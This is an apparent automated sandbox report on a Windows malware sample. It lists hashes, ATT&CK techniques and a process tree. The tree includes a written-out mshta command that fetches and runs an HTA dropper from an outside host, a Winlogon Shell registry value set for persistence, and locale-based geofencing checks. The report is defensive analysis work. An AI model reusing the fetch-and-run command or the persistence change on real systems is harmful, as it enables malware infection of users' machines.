899489a0ac50ae9bd5d4f71ce4a4fe42c56ae18c25750d747b25a49cfc4ec431

Analysis

max time kernel
150s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21-08-2024 20:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe
Size

704KB
MD5

b4de98edfc58bb18008f042464899e3d
SHA1

a0535152ae6ea0695d02d93879e5bd4f58c0a002
SHA256

899489a0ac50ae9bd5d4f71ce4a4fe42c56ae18c25750d747b25a49cfc4ec431
SHA512

211b9e09e6e5e199445bafde2d460b1010c6676a5dd0714bf0bfecd78bc804b52d863f70472bf7c36076e1367739dd5c65d99dfb3d1223195880881164a65516
SSDEEP

12288:DC4Q0grv/j7HQaxsX7PEcryQ3uPoq5uLXOQMOU8Je7cBw67YMILMBG:DCL0mn/QkWjTB3uzuiQBUeLBw

Score

10^/10

discovery persistence upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://repoiury.com/inst.php?id=forbidden&lang=ENU

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\palladium.exe"	jh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	jh.exe

Executes dropped EXE 1 IoCs

pid	Process
2416	jh.exe

UPX packed file 21 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3004-0-0x0000000000400000-0x0000000000507000-memory.dmp	upx
behavioral2/files/0x0002000000022f9b-13.dat	upx
behavioral2/memory/2416-17-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/3004-19-0x0000000000400000-0x0000000000507000-memory.dmp	upx
behavioral2/memory/2416-20-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-28-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-29-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-30-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-31-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-32-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-33-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-34-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-35-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-36-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-37-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-38-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-39-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-40-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-41-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-42-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2416-43-0x0000000000400000-0x0000000000802000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe
2416	jh.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2416	jh.exe
2416	jh.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3004 wrote to memory of 2416	3004	b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe	88
PID 3004 wrote to memory of 2416	3004	b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe	88
PID 3004 wrote to memory of 2416	3004	b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe	88
PID 2416 wrote to memory of 2708	2416	jh.exe	89
PID 2416 wrote to memory of 2708	2416	jh.exe	89
PID 2416 wrote to memory of 2708	2416	jh.exe	89
PID 2416 wrote to memory of 3468	2416	jh.exe	90
PID 2416 wrote to memory of 3468	2416	jh.exe	90
PID 2416 wrote to memory of 3468	2416	jh.exe	90

C:\Users\Admin\AppData\Local\Temp\b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\b4de98edfc58bb18008f042464899e3d_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Users\Admin\AppData\Local\Temp\jh.exe
  "C:\Users\Admin\AppData\Local\Temp\jh.exe" forbidden
  2⤵
  - Modifies WinLogon for persistence
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" http://repoiury.com/inst.php?id=forbidden&lang=ENU
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\asdfasfas.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\jh.exe

Filesize
467KB

MD5
99ee1e05ed5d532c50cd48a4ec93293b

SHA1
9a007848a55bf2269a9523f23f8dd78a073be950

SHA256
bb2b375d365a0f330e67705ecc487161eb74bde4e5dbe290d16c7abb0f94b37a

SHA512
0a88dcc58bc4072c5a35270ebe39fe662dea7602e0cc93337496cb3589c8f70d468bdd5a55ac400a283685537dd483cb03bbf22b8c63a04eceac52ff470e4a96

Download Submit
C:\Users\Admin\AppData\Roaming\asdfasfas.bat

Filesize
122B

MD5
fddfbd9d59143c6855c0e386b4af0446

SHA1
a60145bf547b703ec4cf078fd955fc690272eb00

SHA256
214aca25c648fad0c7f0b799343f07fb24ba4c7df95a0bd0cac13db70e1ea2d0

SHA512
a8f6dd937fb6c126994186e2e66a0c5dd8ef796ded55153f5f32bffe93f2743f55db9bb96288ab46201db1339e9b9b3c09d5c41da57ad3b668132cca7aac1003

Download Submit
memory/2416-31-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-34-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-43-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-20-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-42-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-28-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-29-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-30-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-41-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-32-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-33-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-17-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-35-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-36-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-37-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-38-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-39-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2416-40-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/3004-0-0x0000000000400000-0x0000000000507000-memory.dmp

Filesize
1.0MB

Download
memory/3004-1-0x0000000000700000-0x0000000000701000-memory.dmp

Filesize
4KB

Download
memory/3004-19-0x0000000000400000-0x0000000000507000-memory.dmp

Filesize
1.0MB

Download